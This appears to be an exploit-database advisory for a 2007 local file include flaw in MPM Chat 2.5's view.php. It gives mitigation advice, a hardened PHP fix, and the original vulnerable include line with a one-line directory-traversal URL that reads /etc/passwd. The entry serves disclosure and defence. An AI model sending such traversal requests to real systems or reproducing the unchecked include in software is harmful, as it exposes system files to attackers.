vendor: MPM Chat
by: GloD_M = [Mahmood_ali]
N/A
CVSS
MEDIUM
Local File Include
CWE
Product Name: MPM Chat
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MPM Chat 2.5 (view.php logi) Local File Include Exploit

This exploit allows an attacker to include arbitrary files from the local file system by manipulating the 'logi' parameter in the view.php file. By using directory traversal techniques, an attacker can access sensitive files such as /etc/passwd.

Mitigation:

The vendor should implement input validation and sanitization techniques to prevent directory traversal attacks. Users are advised to update to the latest version of the software.
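One way to apply that validation to the include shown in the V.Code excerpt, as an added example that is not MPM Chat's own code or a vendor patch. It assumes the logs are plain-text files under `archive/` with names like `2007-03-17.txt`; that naming scheme and the helper `resolve_log_path()` are hypothetical.

```php
<?php
// Added example: hardened replacement for the include in view.php.
// Assumption: logs are plain-text files in ./archive, named like "2007-03-17.txt".

function resolve_log_path(string $baseDir, string $requested): ?string
{
    // 1. Allow-list the file name: no slashes, no "..", no NUL bytes,
    //    exactly one fixed extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $requested)) {
        return null;
    }

    // 2. Canonicalise and confirm the result is still inside the base
    //    directory (also catches symlinks pointing out of archive/).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return is_file($path) ? $path : null;
}

// Read the parameter explicitly instead of relying on a global $logi.
$logi = (isset($_GET['logi']) && is_string($_GET['logi'])) ? $_GET['logi'] : '';

if ($logi !== '') {
    $path = resolve_log_path(__DIR__ . '/archive', $logi);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid log name');
    }

    // 3. Treat the log as data: read and escape it, never include() it,
    //    so its contents are not executed as PHP or rendered as markup.
    echo '<pre>',
         htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8'),
         '</pre>';
}
```

With this check, a request such as `logi=../../../../../etc/passwd` fails the allow-list and returns HTTP 400 before any file is opened.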

Exploit-DB raw data:

# MPM Chat 2.5 (view.php logi) Local File Include Exploit
# D.Script: http://mpm.pahviloota.net/mpm_chat_25.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
<?php
if ($logi != '') {
    // $logi is request-controlled and is concatenated into the path unchecked
    include 'archive/' . $logi;
}
#Exploit: /[path]/view.php?logi=../../../../../etc/passwd

# milw0rm.com [2007-03-17]